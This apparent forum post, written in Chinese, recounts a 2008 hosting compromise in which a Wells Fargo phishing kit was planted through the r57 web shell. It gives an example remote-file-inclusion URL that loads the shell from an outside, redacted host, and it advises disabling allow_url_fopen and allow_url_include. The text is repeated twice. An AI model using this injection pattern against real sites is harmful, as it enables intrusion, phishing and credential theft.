阿 土
2008-03-13, 07:10 PM
上午接到朋友 Call 我詢問主機疑似發送大量信件以及有異常流量請我協助
該朋友是把主機當作虛擬主機使用 , 一部主機上面有幾十個網站運作中
猜想不是 ftp 密碼被猜出來就是被放上後門程式
上去查了一下 maillog , 的確有大量的信件寄出 , 不過都是寄給同一個 email , 所以這不是被當成垃圾信跳板
他告知網頁目錄下有檔案被傳上來
於是搜尋每個網站下的某類型檔案 , 在某一個網站下面多了一個 wells.tgz 解壓縮之後出現一個目錄 www.wellsfargo.com
該目錄下的網頁就跟 www.wellsfargo.com 一模一樣
不過那是假的釣魚網頁 , 若不察在假網頁上面輸入帳號及密碼後 , 帳號及密碼就會被寄送到指定的 email
該假網頁除了帳號及密碼外 , 還有個輸入信用卡資料的網頁 , 若不小心信用卡資料也會寄到壞人手中
wells.tgz 是怎麼傳上 Server 的?
並不是透過 Ftp 傳上的 , 而是透過一支俄羅斯駭客寫的 r57 後門程式傳上來的
我之前也抓過另一部朋友的虛擬主機 , 他有個客戶使用 OSC 但沒有更新導致有個嚴重漏洞被 Try 出來 , 並上傳了該後門程式至主機上
當時有看一下該 r57 後門程式 , 只能說很棒,很強大!
該後門程式並非如同我朋友主機上的 OSC 漏洞而上傳上來 , 而是改用直接連結的方式從遠端 Server 呼叫使用
只要在網頁上輸入如下指令: (相關資料以 ??? 取代)
http://www.???.com/index.php?page=http://www.???.ro/~???/r57.txt?
網頁就會變成這樣 , 網頁中間載入了 r57 後門程式 , 且可正常執行
http://img292.imageshack.us/img292/9300/r57qn8.jpg
主要問題發生在兩個地方:
1.該虛擬主機客戶的 index.php 寫法可能導致此問題:(我不會寫程式,看了看應該是此問題,但不是100%確定)
該主機的 index.php 中間有幾行 include($xxx) 的語法
網站的功能 Link 都是以此種方式 "index.php?page=XXX" 開啟
剛好符合上述的駭客執行指令
2.php.ini 開啟了此些功能導致了此漏洞
allow_url_fopen = On
php 5.2 之後又多了 allow_url_include 用以輔助 allow_url_fopen
建議將 php.ini 中的 allow_url_fopen & allow_url_include 都設定成 off
----------------------------------------------------------------
查了一下自己 Server 的 log , 嘗試讀取遠端 .txt 的記錄還不少
看來都是利用現成的駭客程式掃瞄測試的
若被測試成功就難免會遇到此次被駭網站的遭遇
贊助商連結
該朋友是把主機當作虛擬主機使用 , 一部主機上面有幾十個網站運作中
猜想不是 ftp 密碼被猜出來就是被放上後門程式
上去查了一下 maillog , 的確有大量的信件寄出 , 不過都是寄給同一個 email , 所以這不是被當成垃圾信跳板
他告知網頁目錄下有檔案被傳上來
於是搜尋每個網站下的某類型檔案 , 在某一個網站下面多了一個 wells.tgz 解壓縮之後出現一個目錄 www.wellsfargo.com
該目錄下的網頁就跟 www.wellsfargo.com 一模一樣
不過那是假的釣魚網頁 , 若不察在假網頁上面輸入帳號及密碼後 , 帳號及密碼就會被寄送到指定的 email
該假網頁除了帳號及密碼外 , 還有個輸入信用卡資料的網頁 , 若不小心信用卡資料也會寄到壞人手中
wells.tgz 是怎麼傳上 Server 的?
並不是透過 Ftp 傳上的 , 而是透過一支俄羅斯駭客寫的 r57 後門程式傳上來的
我之前也抓過另一部朋友的虛擬主機 , 他有個客戶使用 OSC 但沒有更新導致有個嚴重漏洞被 Try 出來 , 並上傳了該後門程式至主機上
當時有看一下該 r57 後門程式 , 只能說很棒,很強大!
該後門程式並非如同我朋友主機上的 OSC 漏洞而上傳上來 , 而是改用直接連結的方式從遠端 Server 呼叫使用
只要在網頁上輸入如下指令: (相關資料以 ??? 取代)
http://www.???.com/index.php?page=http://www.???.ro/~???/r57.txt?
網頁就會變成這樣 , 網頁中間載入了 r57 後門程式 , 且可正常執行
http://img292.imageshack.us/img292/9300/r57qn8.jpg
主要問題發生在兩個地方:
1.該虛擬主機客戶的 index.php 寫法可能導致此問題:(我不會寫程式,看了看應該是此問題,但不是100%確定)
該主機的 index.php 中間有幾行 include($xxx) 的語法
網站的功能 Link 都是以此種方式 "index.php?page=XXX" 開啟
剛好符合上述的駭客執行指令
2.php.ini 開啟了此些功能導致了此漏洞
allow_url_fopen = On
php 5.2 之後又多了 allow_url_include 用以輔助 allow_url_fopen
建議將 php.ini 中的 allow_url_fopen & allow_url_include 都設定成 off
----------------------------------------------------------------
查了一下自己 Server 的 log , 嘗試讀取遠端 .txt 的記錄還不少
看來都是利用現成的駭客程式掃瞄測試的
若被測試成功就難免會遇到此次被駭網站的遭遇
贊助商連結